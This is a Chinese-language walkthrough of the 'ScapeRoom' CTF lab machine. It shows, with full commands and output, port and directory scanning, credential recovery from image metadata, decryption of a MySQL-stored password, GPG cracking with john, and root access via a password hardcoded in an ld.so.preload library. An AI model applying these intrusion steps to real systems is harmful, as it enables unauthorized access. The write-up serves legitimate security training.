TheHackersLabs-ScapeRoom-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.162  08:00:27:07:8f:0e       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f9:b3:de       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.071 seconds (123.61 hosts/sec). 4 responded
❯ export ip=192.168.60.162
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.162:22
Open 192.168.60.162:80
Open 192.168.60.162:3306
Open 192.168.60.162:33060
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 17:10 CST
Initiating ARP Ping Scan at 17:10
Scanning 192.168.60.162 [1 port]
Completed ARP Ping Scan at 17:10, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:10
Completed Parallel DNS resolution of 1 host. at 17:10, 0.25s elapsed
DNS resolution of 1 IPs took 0.25s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:10
Scanning 192.168.60.162 [4 ports]
Discovered open port 80/tcp on 192.168.60.162
Discovered open port 22/tcp on 192.168.60.162
Discovered open port 33060/tcp on 192.168.60.162
Discovered open port 3306/tcp on 192.168.60.162
Completed SYN Stealth Scan at 17:10, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.60.162
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-24 17:10:38 CST for 0s

PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 64
80/tcp    open  http    syn-ack ttl 64
3306/tcp  open  mysql   syn-ack ttl 64
33060/tcp open  mysqlx  syn-ack ttl 64
MAC Address: 08:00:27:07:8F:0E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

浏览器访问80端口，是个类似探针的服务，

扫描目录

你可以看一下网页源代码中藏了一段密文

❯ curl http://$ip/
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Lecturas de Sensores</title>
    <link rel="stylesheet" href="css/style.css">
    <!-- QSB2ZWNlcywgbG8gbcOhcyBvYnZpbyBlcyBsbyBxdWUgc2UgcGFzYSBwb3IgYWx0by4gVHUgw7puaWNhIHNhbGlkYSBlcyB2ZXIgbG8gcXVlIG90cm9zIG5vIHZlbi4gRWwgdGllbXBvIGNvcnJlIHkgY2FkYSBwaXN0YSBlcyB1bmEgcGllemEgY2xhdmUgZGVsIHJvbXBlY2FiZXphcy4K -->

给了一个提示

不过我扫了一下目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.162
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/administracion       (Status: 301) [Size: 325] [--> http://192.168.60.162/administracion/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.60.162/css/]
/index.php            (Status: 200) [Size: 4271]
/index.php            (Status: 200) [Size: 4271]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

访问administracion会403未授权

通过这个目录再扫一下

可以看到有个login

❯ gobuster dir -u http://$ip/administracion -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.162/administracion
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 2714]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

我尝试弱口令登入后，发现在返回包中藏了一点提示

给了个域名和子域名

sensores.thl info.sensores.thl

图片详细隐藏

在info的子域名下，多了一张图片

wget下来

发现在图片评注中存在base64编码

❯ wget http://info.sensores.thl/images/sensor_overview.png
--2025-01-24 20:34:10--  http://info.sensores.thl/images/sensor_overview.png
Resolving info.sensores.thl (info.sensores.thl)... 192.168.60.162
Connecting to info.sensores.thl (info.sensores.thl)|192.168.60.162|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1930599 (1.8M) [image/png]
Saving to: ‘sensor_overview.png’

sensor_overview.pn 100%[==============>]   1.84M  --.-KB/s    in 0.06s

2025-01-24 20:34:10 (31.8 MB/s) - ‘sensor_overview.png’ saved [1930599/1930599]

❯ exiftool sensor_overview.png
ExifTool Version Number         : 13.00
File Name                       : sensor_overview.png
Directory                       : .
File Size                       : 1931 kB
File Modification Date/Time     : 2024:11:04 01:02:04+08:00
File Access Date/Time           : 2025:01:24 20:34:10+08:00
File Inode Change Date/Time     : 2025:01:24 20:34:10+08:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 1147
Image Height                    : 1147
Bit Depth                       : 8
Color Type                      : RGB
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Comment                         : YWN1dGU6SVM0eUJ2Znd4cFhVWnNCeGhDWHI1bXV2M2RYZFFnIQo=
Image Size                      : 1147x1147
Megapixels                      : 1.3
❯ echo "YWN1dGU6SVM0eUJ2Znd4cFhVWnNCeGhDWHI1bXV2M2RYZFFnIQo="|base64 -d
acute:IS4yBvfwxpXUZsBxhCXr5muv3dXdQg!

得到用户凭证，重新登录一下

好吧，不行，但是这个靶机上开放了3306端口

MySql任务

尝试利用这个登入mysql

❯ mysql -h 192.168.60.162 -u acute -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 39
Server version: 8.0.40-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| SensorData         |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.010 sec)

MySQL [(none)]> use SensorData
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [SensorData]> show tables;
+------------------------+
| Tables_in_SensorData   |
+------------------------+
| login                  |
| sensor_readings        |
| sensor_readings_backup |
+------------------------+
3 rows in set (0.002 sec)

MySQL [SensorData]> select * from login;
+----+---------------+------------------------------------------------------------------+
| id | usuario       | password                                                         |
+----+---------------+------------------------------------------------------------------+
|  1 | administrador | BD9D09C524BC8A234E0B75D4FA60AF8A71D124915A3D44BC17B761186D0EB00E |
+----+---------------+------------------------------------------------------------------+
1 row in set (0.001 sec)

拿到了用户凭证，不过密码很明显是加密后的

回想一下，这个数据库中存在着之前网页中的环境数据，而且会定期更新

那数据库中可能存在任务事件

我们show一下所有的任务时间列表

MySQL [SensorData]> show events from SensorData;
+------------+--------------------+----------------+-----------+-----------+------------+----------------+----------------+---------------------+------+---------+------------+----------------------+----------------------+--------------------+
| Db         | Name               | Definer        | Time zone | Type      | Execute at | Interval value | Interval field | Starts              | Ends | Status  | Originator | character_set_client | collation_connection | Database Collation |
+------------+--------------------+----------------+-----------+-----------+------------+----------------+----------------+---------------------+------+---------+------------+----------------------+----------------------+--------------------+
| SensorData | insert_login_data  | acute@%        | SYSTEM    | RECURRING | NULL       | 1              | MINUTE         | 2024-11-02 22:46:13 | NULL | ENABLED |          1 | utf8mb3              | utf8mb3_general_ci   | utf8mb4_0900_ai_ci |
| SensorData | sensor_data_update | root@localhost | SYSTEM    | RECURRING | NULL       | 1              | MINUTE         | 2024-11-01 18:02:42 | NULL | ENABLED |          1 | utf8mb4              | utf8mb4_0900_ai_ci   | utf8mb4_0900_ai_ci |
+------------+--------------------+----------------+-----------+-----------+------------+----------------+----------------+---------------------+------+---------+------------+----------------------+----------------------+--------------------+
2 rows in set (0.005 sec)

果然存在login的任务

查询任务的详细

发现每分钟会执行一次随机生成16位密码并与encryption_key密钥进行AES加密转为十六进制

MySQL [SensorData]> SHOW CREATE EVENT insert_login_data;
+-------------------+-----------------------------------------------------------------------------------------------------------------------+-----------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+----------------------+--------------------+
| Event             | sql_mode                                                                                                              | time_zone | Create Event                                                                                                                                                                                                                                                                                                                                                                                                                | character_set_client | collation_connection | Database Collation |
+-------------------+-----------------------------------------------------------------------------------------------------------------------+-----------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+----------------------+--------------------+
| insert_login_data | ONLY_FULL_GROUP_BY,STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_ENGINE_SUBSTITUTION | SYSTEM    | CREATE DEFINER=`acute`@`%` EVENT `insert_login_data` ON SCHEDULE EVERY 1 MINUTE STARTS '2024-11-02 22:46:13' ON COMPLETION NOT PRESERVE ENABLE DO BEGIN

    IF (SELECT COUNT(*) FROM login) = 0 THEN
        SET @password_plain = SUBSTRING(MD5(RAND()), 1, 16);
        INSERT INTO login (usuario, password)
        VALUES ('administrador', HEX(AES_ENCRYPT(@password_plain, 'encryption_key')));
    END IF;
END | utf8mb3              | utf8mb3_general_ci   | utf8mb4_0900_ai_ci |
+-------------------+-----------------------------------------------------------------------------------------------------------------------+-----------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+----------------------+--------------------+
1 row in set (0.001 sec)

那我们在mysql中尝试解密一下

MySQL [SensorData]> select * from login
    -> ;
+----+---------------+------------------------------------------------------------------+
| id | usuario       | password                                                         |
+----+---------------+------------------------------------------------------------------+
|  1 | administrador | BD9D09C524BC8A234E0B75D4FA60AF8A71D124915A3D44BC17B761186D0EB00E |
+----+---------------+------------------------------------------------------------------+
1 row in set (0.001 sec)

MySQL [SensorData]> SELECT CONVERT(AES_DECRYPT(UNHEX(password), 'encryption_key') USING utf8)
    -> AS decrypted_password FROM login WHERE usuario = 'administrador';
+--------------------+
| decrypted_password |
+--------------------+
| e381025ee5804e9a   |
+--------------------+
1 row in set, 1 warning (0.001 sec)

登入上拿到一个新的用户

到这，卡住了，ssh登不上去

后来从其他大佬复盘中得知，这个用户ssh连接只能从10网段连上去，做了限制

#cat /etc/ssh/sshd_config
#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $
ListenAddress 0.0.0.0
AllowUsers [email protected]/24 [email protected]/24
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

我说为什么靶机下载下来的时候会有让你多加一个nat网卡

但我kali没法桥接virtualbox的nat

无奈之下，只能从靶机上直接登录

然后从靶机上反弹一个shell到kali，这靶机的键盘布局还不一样的，打个斜杠太费劲，试了好多次

后面直接换到西班牙的屏幕键盘

用户提权

❯ pwncat-cs -lp 4444
[21:35:44] Welcome to pwncat 🐈!                                                                                                                                   __main__.py:164
[21:43:21] received connection from 192.168.60.162:47400                                                                                                                bind.py:84
[21:43:22] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                                              manager.py:957
           192.168.60.162:47400: registered new host w/ db                                                                                                          manager.py:957
(local) pwncat$
(remote) pepito@ctf:/home/pepito$ ls
leeme.txt.gpg  user.txt
(remote) pepito@ctf:/home/pepito$ cat user.txt
qW1eR2tY3uIoP4aS5dF6gH7jK8lZxCvBnMp
(local) pwncat$ download leeme.txt.gpg
leeme.txt.gpg ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 225/225 bytes • ? • 0:00:00
[21:45:23] downloaded 225.00B in 0.17 seconds 

用户家目录有个gpg文件，down到本地爆破一下

拿到密码superman1

❯ gpg2john leeme.txt.gpg >hash

File leeme.txt.gpg
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
superman1        (?)
1g 0:00:00:16 DONE (2025-01-24 21:46) 0.05959g/s 66.74p/s 66.74c/s 66.74C/s superman1..hamster
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Root提权

打开gpg文件，又给了个提示

❯ gpg --decrypt leeme.txt.gpg
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
No todas las funciones tienen el control que parecen tener. Algunas veces, quien controla lo que se **carga primero** tiene la ventaja. Recuerda: la pre-carga puede ser tu mejor aliada... o tu perdición.
并非所有的功能都拥有它们看起来拥有的控制力。有时，控制**预加载**的人会占据优势。记住：预加载可能是你最好的朋友...也可能会带来灭亡。

预加载是什么？？

在Linux中，预加载是一种技术，用于加速程序的启动过程。预加载器（preload）是一个用户空间程序，它在程序启动之前加载程序所需的共享库（shared library），从而减少程序启动时的延迟时间。

可以通过ldd命令查看共享库的依赖项

比如查看ls的依赖

(remote) pepito@ctf:/home/pepito$ ldd /bin/ls
        linux-vdso.so.1 (0x00007ffd01954000)
        /lib/libscaperoom.so (0x00007fc705f00000)
        libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007fc705ecd000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc705cdb000)
        libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fc705cd5000)
        libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007fc705c44000)
        /lib64/ld-linux-x86-64.so.2 (0x00007fc705f2c000)
        libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fc705c21000)
--------------分隔--------------
kali本机的依赖项
❯ ldd /bin/ls
        linux-vdso.so.1 (0x00007ffff698a000)
        libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f48f9619000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48f9423000)
        libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007f48f9381000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f48f968c000)

很明显/lib/libscaperoom.so这个是不寻常的

我们看一下预加载的配置文件

确定了这个库so文件被加载

(remote) pepito@ctf:/home/pepito$ cat /etc/ld.so.preload
/lib/libscaperoom.so

打印一下库文件的.rodata区字段，一般都是常量字符串和只读变量之类的

其中就发现了su切换root的密码

(remote) pepito@ctf:/home/pepito$ readelf -p .rodata /lib/libscaperoom.so

String dump of section '.rodata':
  [     0]  read
  [     5]  /proc/%d/comm
  [    13]  r
  [    15]  su^J
  [    19]  rT8hQ9VcYb5kLmXo
  [    2b]  [+] Acceso root concedido!
  [    48]  [+] Reloj detenido... Buen trabajo!!!
  [    70]  /bin/systemctl stop apagar_automatico.service
  [    9e]  /bin/bash

尝试切换一下

果然上来了

(remote) pepito@ctf:/home/pepito$ su root
Password:
[+] Acceso root concedido!
[+] Reloj detenido... Buen trabajo!!!
(remote) root@ctf:/home/pepito# cat /root/root.txt
==================================================
¡ENHORABUENA, INTRÉPIDO HACKER!

Has logrado superar todos los desafíos y escapar de esta sala virtual. El tiempo no fue tu enemigo,
sino tu aliado, y cada decisión te ha llevado hasta este momento.

La clave para tu victoria es:

AaSdF8gHjKlZxCvB6nM7OoPqW1eR2tY3uIoP

Esta flag es el símbolo de tu éxito y la prueba de que has alcanzado el nivel más alto de este reto.
Guarda este logro con orgullo, pues no todos pueden llegar tan lejos.

Recuerda:
- Cada pista que descifraste fue una lección valiosa.
- Cada error que cometiste, una oportunidad de crecer.
- Cada éxito, un paso más hacia el dominio.

Esto no es el final, sino el comienzo de nuevos desafíos. ¿Estás preparado para lo que viene?

¡Nos vemos en el próximo reto, donde tu ingenio será puesto a prueba una vez más!

==================================================

这个靶机做的有点艰难，磕磕碰碰的，还是参考了其他大佬的WP😥